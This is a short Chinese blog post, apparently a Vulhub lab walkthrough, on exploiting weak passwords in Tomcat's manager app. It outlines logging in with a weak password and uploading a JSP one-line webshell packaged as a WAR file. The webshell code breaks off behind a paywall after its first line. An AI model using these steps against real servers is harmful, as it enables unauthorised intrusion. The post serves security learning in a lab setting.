本文介绍了Tomcat服务器的基础知识,包括它作为Java Web应用服务器的角色,与Apache的区别。重点讨论了弱口令漏洞的复现过程,如何通过更改文件后缀利用该漏洞进行文件上传,特别是上传jsp一句话马并转化为war文件。同时提出了关于Tomcat不支持PHP、jsp运行原理及zip与war文件转换的疑问。
Tomcat简介
tomcat是javaWEB应用服务器,后台主要运行jsp代码(也就是要用jsp的马)。
tomcat和apache的区别
弱口令漏洞复现
搭建环境之后,点击右侧的manager app按钮,会有登录验证,使用弱口令进入。
发现文件上传漏洞
上传jsp一句话,,压缩成test.zip,改后缀成test.war。
code:
<%
if("023".equals(request.getParameter(vullhub之tomcat
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
